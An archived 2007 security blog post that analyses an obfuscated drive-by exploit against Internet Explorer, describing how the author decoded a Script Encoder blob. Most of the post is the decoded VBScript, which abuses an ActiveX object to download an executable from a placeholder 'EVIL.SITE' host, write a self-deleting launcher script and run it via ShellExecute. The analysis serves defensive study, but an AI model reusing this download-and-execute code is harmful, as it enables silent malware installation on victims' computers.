You are viewing a read-only archive of the Blogs.Harvard network. Learn more.
Skip to content

Targeting IE

An easy way to target Internet Explorer is to use VBScript as the exploit obfuscation mechanism. In this case an ancient form of encryption called the Windows Scripting Encoder. It was hoped to “protect” source code from prying eyes but as substitution ciphers go this one didn’t really help much. A decoder was written which I found still worked very well for the purposes of this exercise.

<%’**Start Encode**#@~^RhUAAA==@#@[LONG LINES OF CHARS]#@&cSMEAA==^#~@>

The decrypted page contained yet another blob to decode but this time it was simply ASCII character numbers. Ruby made quick work of this using sprintf

characters.each do |character|
message = message + sprintf("%c", character.to_i)
end

<script language="VBScript">
<%@ LANGUAGE = VBScript.Encode %>

<%
AK47="http://EVIL.SITE/xy.exe"

Function rechange(kitty)
str=Split(kitty,",")
T=""
For i = 0 To UBound(str)
T=T+Chr(eval(str(i)))
Next
rechange=T
End Function
T="[LONG STRING OF COMMA SEPARATED DIGITS]"
i=T
execute(rechange(I))
%>

The ending here is predictable. The decoded segment uses ADODB to deliver an executable to the victim and executes it with Application.Shell It did have the look of code which was machine generated and not written by hand. That reeks of a toolkit!
There is an interesting forum post with the quote “rav is rubbish” plus several mentions of this code in Chinese forums.


'11
https="rav is rubbish"
'11
On Error Resume Next
'11
jjyy= "ob"&"je"&"ct"
'11
Set PP=document.createElement(jjyy)
'11
PP.SetAttribute "class"+"id", "clsid"&":BD96"&"C556"&"-65A3-"&"11D0-98"&"3A-00C04"&"FC2"&"9E36"
'11
Set XXX1=PP.CreateObject("M"&"ic"&"ros"&"oft."&"XML"&"HT"&"TP","")
'11
XXX1.Open "G"&"ET", AK47, False
'11
XXX1.Send
'11
ExeName="co"&"mm"&"om"&"d.pif"
'11
CallVbs="ca"&"ll.vbs"
'11
Set XXX2=PP.createobject("Scri"&"p"&"ti"&"ng.F"&"i"&"le"&"Sy"&"st"&"e"&"mO"&"bje"&"ct","")
'11
Set XXX3=XXX2.GetSpecialFolder(2)
'11
ExeName=XXX2.BuildPath(XXX3,ExeName)
'11
CallVbs=XXX2.BuildPath(XXX3,CallVbs)
'11
AAA="A"&"d"
'11
CCC="o"&"d"&"b"&"."&"s"&"tre"&"am"
'11
DC=AAA&CCC
'11
Set XXX4=PP.createobject(DC,"")
'11
XXX4.type=1
'11
XXX4.Open
'11
XXX4.Write XXX1.ResponseBody
'11
XXX4.Savetofile ExeName,2
'11
XXX4.Close
'11
XXX4.Type=2
'11
XXX4.Open
'11
XXX4.WriteText "On Error Resume Next"&vbCrLf&"Set ws=CreateObject(""Wscript.Shell"")"&vbCrLf&"ws.Run ("""&ExeName&""")"&vbCrLf&"Set fso = CreateObject(""Scripting.FileSystemObject"")"&vbCrLf&"WScript.Sleep 1000"&vbCrLf&"fso.DeleteFile(WScript.ScriptName)"&vbCrLf&"If fso.FileExists("""&CallVbs&""") Then fso.DeleteFile("""&CallVbs&""")"&vbCrLf&"If fso.FileExists("""&html&""") Then fso.DeleteFile("""&html&""")"
'11
XXX4.Savetofile CallVbs,2
'11
XXX4.Close
'11
GBA="Sh"&"e"&"l"&"l"&"."&"Ap"&"p"&"li"
'11
GBP="ca"&"ti"&"on"
'11
Set APIRun=PP.createobject(GBA&GBP,"")
'22
'33
APIRun.ShellExecute CallVbs,"","","Open",0
'44

This was written by zeroday. Posted on Friday, July 6, 2007, at 5:31 pm. Filed under Digital Warfare. Bookmark the permalink. Follow comments here with the RSS feed. Post a comment or leave a trackback.

Post a Comment

You must be logged in to post a comment.
Proudly powered by WordPress. Hosted by Pressable.